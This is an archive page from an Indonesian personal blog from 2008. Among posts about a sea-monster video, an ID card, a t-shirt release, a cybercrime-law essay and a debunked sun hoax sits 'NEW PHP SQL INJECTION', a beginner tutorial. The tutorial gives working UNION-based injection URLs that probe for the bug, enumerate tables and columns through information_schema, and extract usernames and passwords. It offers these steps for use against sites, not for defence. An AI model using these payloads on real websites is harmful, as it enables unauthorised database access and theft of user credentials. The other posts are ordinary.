29
Apr
10

NewBlog

nih blog baru saya tapi jarang diupdate juga sech .heheh

My Sweet Home

14
Nov
08

Video Monster Ancol

nih video Monster Ancol tau yang di sebut “Kutu air” oleh nelayan
atut, merinding ngeliatnya :lol:

Versi anak Kaskus

Versi TransTV

Versi ANTV

smuanye dari youtube

13
Nov
08

Akhirnya jadi juga

sekian lama menanti bertahun-tahun (engga dink:P) akhirnya jadi juga

ga tau kan apa yang jadi wkakakkakakakak huh sepele sih

KTP baru jadi :D bikin dari bulan puasa jadi skarang smalem baru di anterin ke rumah

BIKIN KTP AJA KO REPOT !

APA KATA DUNIA ¿

05
Nov
08

Kaos Echo.or.id Telah di rilis

Tidak perlu banyak cerita lagi, cuma mau menginfokan bagi yang berminat, bahwa kaos echo.or.id yang sudah di informasikan kemarins telah di rilis.

Info lebih lanjut kunjungi http://kaos.echo.or.id

Berikut beberapa foto lainnya.(klik untuk memperbesar)

Mudah-mudahan dengan dirilisnya kaos resmi echo ini cukup menghibur kita semua ditengah hausnya kaos bernuansa “underground” dan semoga dapat memeriahkan dunia fashion yang ada (*gedubrak*) .

Dengan membeli kaos ini berarti anda ikut membiayai kelangsungan hidup (domain, hosting) komunitas echo, “cheers” . “Danke

19
Okt
08

NEW PHP SQL INJECTION By.DarKDeviL

*****************************
*** NEW PHP SQL INJECTION ***
*****************************
Level : | * | (Beginer/Newbie/Pemula)
Mode : Bacot Mode OFF (Ga pake basa basi :) )
Testing : On Localhost (Server Local;pake apache2triad)
Vulnerability CMS : Share CMS (Telah dilampirkan pada Archive)

———————————————————————-

Note : Magic_Quote_GPC pada php.ini harus dalam posisi mode “OFF”!!!

1. Cek Vulnerability.

Untuk mengecek apakah suatu site memiliki bug kita dapat menggunakan cara-cara berikut :
a. Letakkan karakter Single Quote pada akhri url address bar.
ie : http://www.target.com/index.php?pageID=1&#8242; <== karakter diletakkan di belakang url address bar.

b. Gunakan Operator Logika.
Anda bisa gunakan operator and,or,dll.
Ex 1 : and 1=1
ie : http://www.target.com/index.php?pageID=1 and 1=1 <== Return True, artinya jika kita meletakkan operator logika tersebut maka tidak terjadi error alias page berjalan dengan normal.

Ex 2 : and 1=2
ie : http://www.target.com/index.php?pageID=1 and 1=2 <== Return False, artinya jika kita meletakkan operator logika tersebut maka terjadi error alias page tidak berjalan dengan normal.

Note : Untuk menggunakan operator logika tergantung dengan kebutuhan yang diperlukan. Selain itu kekreatifitasan kita dituntut disini. Kenapa? karena kadang ketika kita meletakkan operator logika, situs tidak memberi respon apa-apa. Untuk itu, kekreatifitasan anda di perlukan disini. Bagaimana anda membangkitkan error. Hehehehehehe :)

2. Cek Kolom.
Setelah kita mengetahui bahwa suatu site memiliki bug sql injection, maka tahap selanjutnya adalah mengecek kolom yang ada. Untuk mengecek kolom, kita dapat gunakan statement “ORDER By x”, dimana x adalah nilai increment dari integer 1,2,…dst. Increment maksudnya adalah lakukan penambahan nilai x sampai ditemukan pesan error seperti “… Unknown Colomn ‘x’ …”.

ie :
- http://www.target.com/index.php?pageID=1+order+by+1/* <== Return True.
- http://www.target.com/index.php?pageID=1+order+by+2/* <== Return True.
- http://www.target.com/index.php?pageID=1+order+by+3/* <== Return True.
- http://www.target.com/index.php?pageID=1+order+by+4/* <== Return False.

Note : Kita asumsikan bahwa ketika kita memasukkan nilai 4, maka muncul pesan error “Unknown Colomn ’4′”, maka kita dapat menarik suatu kesimpulan bahwa kolom yang ada hanya 1,2, dan 3.

3. Cek Hole Pada Kolom.
Untuk mengecek di kolom berapa terdapat hole atau kolom yang bermasalah kita bisa gunakan stament “UNION ALL SELECT ” atau “UNION SELECT ” ,dll.

Note : Ingat!!!jangan lupa menggunakan karakter “-”, seperti dibawah ini :

ie :
- http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,2,3/*

Note : Kita asumsikan kolom yang bermasalah terdapat pada angka ’2′. Bagaimana cara kita mengetahuinya ? kita bisa lihat pada page, karena kolom yang bermasalah tersebut nantinya akan ditampilkan pada page. Lagi-lagi kejelian mata dan kekreatifitasan kita di butuhkan disini!!!

4. Cek Versi MYSQL.
Mengapa perlu mengecek versi dari MySQL? karena teknik sql injection untuk v 4.xx atau < v 5.xx tidak sama. Pada paper ini saya menggunakan v 5.xx.

Untuk mengecek versi mysql kita bisa gunakan statement “@@version,version(),dll” tergantung kebutuhan system.

Note : Jika page tidak meload versi mysql? Gunakan kreatifitas anda. Lakukan manipulasi-manipulasi pada url address, seperti :
convert(@@version using latin1), unhex(hex(@@version)) , dll.

ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,@@version,3/*
ie :

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,convert(@@version+using+latin1),3/*

ie :

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,unhex(hex(@@version)),3/*

Note : Kita Asumsikan versi dari mysql adalah 5.x.x

5. Cek Tabel dan Kolom.
a. Cek Tabel.
Untuk mengecek tabel gunakan statement berikut :
” information_schema.tables + table_name “

ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,table_name,3+from+information_schema.tables/*

Note :
- Jika page tidak meload informasi tabel, gunakan convert() atau unhex(hex()) atau lainnya.

- Gunakan statement Limit untuk mengekstrak tabel yang ada.

ie :
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,table_name,3+from+information_schema.tables+limit+1,1/* <=== Lakukan increment pada angka 1,1 sampai kita temukan informasi tabel yang berguna, seperti user,username,admin,administrator,dll

b. Cek Kolom
Cara pengecekan kolom hampir sama dengan pengecekan tabel, hanya saja pada pengecekan kolom kita gunakan statement berikut :
” information_schema.columns … column_name … “

ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,column_name,3+from+information_schema.columns/*

Note : Gunakan Statment Limit untuk mengekstrak kolom-kolom yang ada.

Tips : Untuk mengekstrak kolom pada tabel tertentu kita bisa gunakan statement berikut :

ie:
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,column_name,3+from+information_schema.columns+where+table_name=’user’/* <=== kita asumsikan kita telah mengetahui bahwa terdapat tabel user.

Note : Seperti biasa untuk mengekstrak kolom-kolom tersebut kita gunakan statement LIMIT.

6. Get Value of Colomn.
Setelah kita ketahui nama-nama kolom yang ada pada table, maka langkah selanjutnya adalah mengekstrak nilai-nilai tersebut. Untuk mengekstrak nilai tersebut kita bisa melakukannya secara satu persatu dan atau secara keseluruhan atau bersamaan.

Note : Asumsikan bahwa kita mengetahui bahwa table user memiliki kolom ‘username’ dan ‘password’.

a. Secara satu per satu.
ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,username,3+from+user/*
ie :

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,password,3+from+user/*

b. Secara keseluruhan atau bersamaan.
Gunakan statement concat() atau concat_ws()
ie :
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,concat(username,0x3a,password),3+from+user/* <=== 0x3a adalah hexa dari karakter ‘ : ‘

Note : Jika anda ingin mengetahui lebih jelas mengenai tutorial ini silahkan lihat video tutorialnya (sudah saya lampirkan pada archive file ini :) )

===================================Selesai================================

This paper created by
**DarKDeviL**

==========================Terima Kasih==========================

Download Lengkap Di Sini
SQL VULN.rar

17
Okt
08

Cyber Crime dan Upaya Antisipasinya Secara Yuridis (II)

Pada dasarnya setiap kegiatan atau aktifitas manusia dapat diatur oleh hukum. Hukum disini direduksi pengertiannya menjadi peraturan perundang-undangan yang dibuat oleh negara, begitu pula aktifitas kejahatan mayantara yang menjadikan internet sebagai sarana utamanya ini. Dalam kaitan dengan teknologi informasi khususnya dunia maya, peran hukum adalah melindungi pihak-pihak yang lemah terhadap eksploitasi dari pihak yang kuat atau berniat jahat, disamping itu hukum dapat pula mencegah dampak negatif dari ditemukannya suatu teknologi baru .
Akan tetapi pada kenyataannya hukum sendiri belum dapat mengatasi secara riil terhadap permasalahan-permasalahan yang ditimbulkan oleh teknologi khususnya teknolgi nformasi. Salah satu bukti kongkretnya adalah timbulnya berbagai kejahatan di dunia cyber yang ternyata belum bisa diatasi sepenuhnya oleh hukum.
Saat ini berbagai upaya telah dipersiapkan untuk memerangi cyber crime. The Organization for Economic Co-operation and Development (OECD) telah membuat guidelines bagi para pembuat kebijakan yang berhubungan dengan computer related crime , dimana pada tahun 1986 OECD telah mempublikasikan laporannya yang berjudul “computer related crime: analysis of legal policy”. Laporan ini berisi hasil survei terhadap peraturan perundang-undangan negara-negara anggota beserta rekomendasi perubahannya dalam menanggulangi computer related crime tersebut, yang mana diakui bahwa sistem telekomunikasi juga memiliki peran penting didalam kejahatan tersebut. Melengkapi laporan OECD, The Council of Europe (CE) berinisiatif melakukan studi mengenai kejahatan tersebut. Studi ini memeberikan guidelines lanjutan bagi para pengambil kebijakan untuk menentukan tindakan-tindakan apa yang seharusnya dilarang berdasakan hukum pidana negara-negara anggota dengan tetap mempehatikan keseimbangan antara hak-hak sipil warga negara dan kebutuhan untu melakukan proteksi terhadap computer related crime tersebut. Pada perkembangannya, CE membentuk Committee of Experts on Crime ini Cyber space of The Committee on Crime problem, yang pada tanggal 25 April 2000 telah mempublikasikan draft Convension on Cyber Crime sebagai hasil kerjanya, yang menurut Prof. Susan Brenner dari University of Daytona School of Law, merupakan perjanjian internsional pertama yang mengatur hukum pidana dan aspek proseduralnya untuk berbagai tipe tindak pidana yang berkaitan erat dengan penggunaan komputer, jaringan atau data, serta berbagai penyalahgunaan sejenis18.
Di Indonesia sendiri, setidaknya sudah terdapat Rancangan Undang-Undang Informasi dan Transaksi Elektronik yang di gawangi oleh Direktorat Aplikasi Telematika Departemen Komunikasi dan Informatika. Subyek-subyek muatannya ialah menyangkut masalah yurisdiksi, perlindungan hak pribadi, azas perdagangan secara e-comerce, azas persaingan usaha usaha tidak sehat dan perlindungan konsumen, azas-azas hak atas kekayaan intelektual (HaKI) dan hukum Internasional serta azas Cyber Crime. RUU tersebut mengkaji cyber case dalam beberapa sudaut pandang secara komprehensif dan spesifik, fokusnya adalah semua aktivitas yang dilakukan dalam cyberspace untuk kemudian ditentukan pendekatan mana yang paling cocok untuk regulasi Hukum Cyber di Indonesia.

Jaringan komputer global pada awalnya digunakan hanya unuk saling tukar-menukar informasi, tetapi kemudian meningkat dari sekedar media komunikasi kemudian menjadi sarana untuk melakukan kegiatan komersilseperti informasi, penjualan dan pembelian produk. Keberadaannya menjadi sebuah intangible asset sebagaimana layaknya intelectual property. Adanya pergeseran paradigma dimana jaringan informasi merupakan infrastruktur bagi perkembangan ekonomi suatu negara, mengharuskan kita secara sistematis membangun pertumbuhan pemanfaatan TI di Indonesia. Kompetisi yang terjadi pun harus senantiasa disiasati dengan melihat secara positif kompetisi yang sedang berlangsung. Negara manapun tidak mungkin menghindari ini, selain harus mengikuti irama kemajuan dengan menjadikan kemajuan yang telah dicapai oleh negara lain sebagai pemacu dalam mengembangkan TI di negara kita.
Hal itu sesuai dengan eksistensi kecenderungan Teknologi Informasi pada masyarakat indonesia, adalah sebagai “follower”. Indonesia tidak tertinggal jauh dalam “kualitas”, tapi memang tertinggal jauh dalam “kuantitas”. kuantitas pun masih bisa di bilang cukup memadai jika diukur dari total penduduk Indonesia yang sudah mengenal teknologi inforamtika, dan bukan dari prosesntase pengguna teknologi informatika.
Dalam konteks kualitatif, dengan akselerasi macam apapun yg masih logis (katakan dengan optimalisasi daya dan upaya), Indonesia akan tetap tertinggal. Maka ketertinggalan adalah bukan isu yang “essensial”. Dan secara realistis, bahwa kita memang tidak tinggal diam.
Hal tersebut harus sudah diciptakan sejak dini, karena telah diakui oleh banyak pihak, teknologi informasi akan menjadi bagian aktifitas terpenting untuk menentukan keberhasilan individu dalam era mendatang yang serba digital.
Contoh kasus di Indonesia
Pencurian dan penggunaan account Internet milik orang lain. Salah satu kesulitan dari sebuah ISP (Internet Service Provider) adalah adanya account pelanggan mereka yang dicuri dan digunakan secara tidak sah. Berbeda dengan pencurian yang dilakukan secara fisik, pencurian account cukup menangkap userid dan password saja. Hanya informasi yang dicuri. Sementara itu orang yang kecurian tidak merasakan hilangnya benda yang dicuri. Pencurian baru terasa efeknya jika informasi ini digunakan oleh yang tidak berhak. Akibat dari pencurian ini, penggunaan dibebani biaya penggunaan acocunt tersebut. Kasus ini banyak terjadi di ISP. Namun yang pernah diangkat adalah penggunaan account curian oleh dua Warnet di Bandung.
Membajak situs web. Salah satu kegiatan yang sering dilakukan oleh cracker adalah mengubah halaman web, yang dikenal dengan istilah deface. Pembajakan dapat dilakukan dengan mengeksploitasi lubang keamanan. Sekitar 4 bulan yang lalu, statistik di Indonesia menunjukkan satu (1) situs web dibajak setiap harinya.
Probing dan port scanning. Salah satu langkah yang dilakukan cracker sebelum masuk ke server yang ditargetkan adalah melakukan pengintaian. Cara yang dilakukan adalah dengan melakukan port scanning atau probing untuk melihat servis-servis apa saja yang tersedia di server target. Sebagai contoh, hasil scanning dapat menunjukkan bahwa server target menjalankan program web server Apache, mail server Sendmail, dan seterusnya. Analogi hal ini dengan dunia nyata adalah dengan melihat-lihat apakah pintu rumah anda terkunci, merek kunci yang digunakan, jendela mana yang terbuka, apakah pagar terkunci (menggunakan firewall atau tidak) dan seterusnya. Yang bersangkutan memang belum melakukan kegiatan pencurian atau penyerangan, akan tetapi kegiatan yang dilakukan sudah mencurigakan.
Berbagai program yang digunakan untuk melakukan probing atau port scanning ini dapat diperoleh secara gratis di Internet. Salah satu program yang paling populer adalah nmap (untuk sistem yang berbasis UNIX, Linux) dan Superscan (untuk sistem yang berbasis Microsoft Windows). Selain mengidentifikasi port, nmap juga bahkan dapat mengidentifikasi jenis operating system yang digunakan.
Sedemikian kompleksnya bentuk kejahatan mayantara dan permasalahnnya menunjukan perlunya seorang profesional yang secara khusus membidangi permasalahan tersebut untuk mengatasi atau setidaknya mencegah tindak kejahatan cyber dengan keahlian yang dimilikinya. Demikian pula dengan perangkat hukum atau bahkan hakimnya sekalipun perlu dibekali pengetahuan yang cukup mengenai kejahatan mayantara ini disamping tersedianya sarana yuridis (produk undang-undang) untuk menjerat sang pelaku.
Cyber Law Sebagai Upaya Pencapaian Enlightening Technology
Kekhawatiran akan kejahatan mayantara di dunia sebetulnya telah dibahas secara khusus dalam suatu lokakarya (yaitu, “ workshop on crimes to computer networks”) yang diorganisir oleh UNAFEI selama kongres PBB X/2000 berlangsung30.
Adapun kesimpulan dari lokakarya tersebut adalah sebagai berikut :
a. CRC (computer-related crime) harus di kriminalisasikan;
b. Diperlukan hukum acara yang tepat untuk melakukan penyidikan dan penuntutan terhadap penjahat cyber (Cyber-crimes”).
c. Harus ada kerjasama antara pemerintah dan industri terhadap tujuan umum pencegahan dan penaggulangan kejahatan komputer agar internet emnjadi tempat yang aman;
d. Diperlukan kerja sama internasional untuk menelusuri/mencari para penjahat di internet;
e. PBB harus mengambil langkah /tindak lanjut yang berhubungan dengan bantuan dan kerjasama tekhnis dalam penanggulangan CRC.
Walaupun Indonesia belum melakukan langkah-langkah kebijakan harmonisasi dengan negara-negara lain, khususnya dalam lingkungan Asia/ASEAN, namun sudah berusaha mengantisipasinya dalam penyusunan konsep KUHP baru. Kebijakan sementara ditempuh di dalam konsep 2000 adalah sebagai berikut31:
a. Dalam buku I (ketentuan Umum) dibuat ketentuan mengenai :
1. Pengertian “barang” (psl.174) yang didalamnya termasuk benda tidak berwujud berupa data dan program komputer, jasa telepon/telekomunikasi/jasa komputer;
2. Pengertian “anak kunci” (psl.178) yang didalamnya termasuk kode rahasia, kunci masuk komputer, kartu magnetik, signal yang telah diprogram untuk membuka sesuatu;
3. Pengertian “surat” (psl.188) termasuk data tertulis atau tersimpan dalam disket, pita magnetik, media penyimpan komputer atau penyipan data elektronik lainnya;
4. Pengertian “ruang” (psl.189) termasuk bentangan atau terminal komputer yang dapat diakses dengan cara-cara tertentu;
5. Pengertian “masuk” (psl.190), termasuk mengakses komputer atau msuk ke dalam sistem komputer;
6. Pengertian jaringan “telepon” (psl.191), termasuk jaringan komputer atau sistem komunikasi komputer;
b. Dalam buku II (Tindak Pidana):
Denagan dibuatnya ketentuan umum seperti diatas, maka konsep tidak/belum membuat delik khusus untuk “cyber crime” atau “CRC “ (computer related crime). Dengan adanya perluasan pengertian dalam buku I di atas, diharapkan dapat menjaring kasus “CC” dengan tetap menggunakan perumusan delik yang ada dalam buku II.
Dalam kenyataanya untuk membuktikan kejahatan maya tersebut sangatlah sulit. Masalahnya dalam pasal 184 KUHAP dikatakan dokumen dan data-data dari alat elektronik tidak bisa menjadi alat bukti. Menurut Burhan Tsani32, untuk menindak para hacker diperlukan keberanian dan inovasi dari para hakim33.
Namun pada dasarnya hukum bagi penindakan terhadap dunia cyber memang masih lemah meskipun di negara maju. jadi ini merupakan suatu hal yang wajar terjadi di Indonesia yang notabene merupakan negara pemula dalam hal Cyber Law.
Menjawab tuntutan dan tantangan komunikasi global lewat internet, undang-undang yang diharapkan (ius constituendum) adalah perangkat hukum yang akomodatif terhadap perkembangan serta antisipatif terhadap permasalahannya, termasuk penyalahgunaan internet dengan motivasi yang dapat menimbulkan korban-korban seperti kerugian materiil dan non-materiil serta dampak psikologisnya, yangdapat merugikan dunia komunikasi serta dampak negatifnya. Yurisprudensi yang aplikatif dalam pemberantasan kejahatan penyalahgunaan internet, nantinya akan sangat relevan sebagai sumber acuan dalam penyusunan rancangan undang-undang tentang internet, yang pada gilirannya menjadi undang-undang. Disamping itu agar hukum mampu mengikuti perkembangan teknologi “judge made law” di peradilan terus berlangsung mengikuti kecepatan perubahan teknologi elektronika34.
Berkaitan dengan substansi cyber law, Freddy35 menyatakan bahwa langkah yang paling tepat pada saat ini adalah melakukan inventarisasi bidang yang paling relevan dengan cyber law di Indonesia.
Langkah yang paling konkret ialah dengan membuat suatu kebijakan sektoral yang di dalamnya mengatur hubungan hukum yang berlangsung. Sebagai gambaran, dalam lingkup perdagangan elektronik (e-commerce) dibuat kebijakan mengenai data elektronik yang dapat diterima di pengadilan. Jika terjadi perselisihan, bukti transaksi dalam transaksi elektronik dapat diterima.
Barda Nawawi Arief36, mengusulkan untuk memberlakukan prinsip ubikuitas (the principle of ubiquity) atas tindak pidana mayantara. Alasannya saat ini semakin marak terjadi cyber crime seiring dengan pertumbuhan penggunaan internet. Yang dimaksud dengan prinsip atau azas ubikuitas adalah prinsip yang mengatakan bahwa delek-delik yang dilakukan atau terjadi di sebagian wilayah teritorial negara sebagian di luar wilayah teritorial suatu negara (ekstrateritorial) harus dapat dibawa ke dalam yurisdiksi setiap negara yang terkait. Ia berpendapat bahwa yurisdiksi personal terhadap pengguna internet dapat diterapkan terhadap kasus-kasus mayantara. (dikutip dari pendapat Masuki Hamano37).

Sumber : depkominfo

15
Okt
08

Matahari Akan Terus Menyinari Kita Selama 36 Jam ¿

tadi saya dapat kiriman message offline dari yahoo messanger saya
isinya gini nih

“Pada tanggal 17 Oct 2008, matahari akan terus menyinari kita selama 36 jam (1.5 hari). Dan selama itu Amerika dan tetangga2nya akan gelap 1.5 hari. Ini akan mengkonversi 3 hari menjadi 2 hari besar. ini terjadi setiap 2,400 tahun sekali. Kita beruntung dapat menyaksikan dan merasakannya”

Versi Lain:

“Coming October 17 the sun will rise continuously for 36 hours (1.5 days) in this time the US countries will be dark for 1.5 days.It will convert 3 days to big days.It will happen once in 2400 years. We are very lucky to see it. Enjoy the day.” on abovetop secret, a forum post says soemoen got a text message froma friend saying,”

telusuri dan telusuri ternyata ini HOAX
selidik dan selidik ternyata Hoax ini awalnya muncul di India. Jadi maksud dari si pembuat hoax ini adalah pada tanggal 17 Oktober 2008 nanti di India akan disinari matahari selama 36 jam, dan di Amerika akan mengalami malam selama 36 jam juga.

untuk lebih jelas silahkan mengunjungi http://mutoha.blogspot.com/ :D




Ikuti

Get every new post delivered to your Inbox.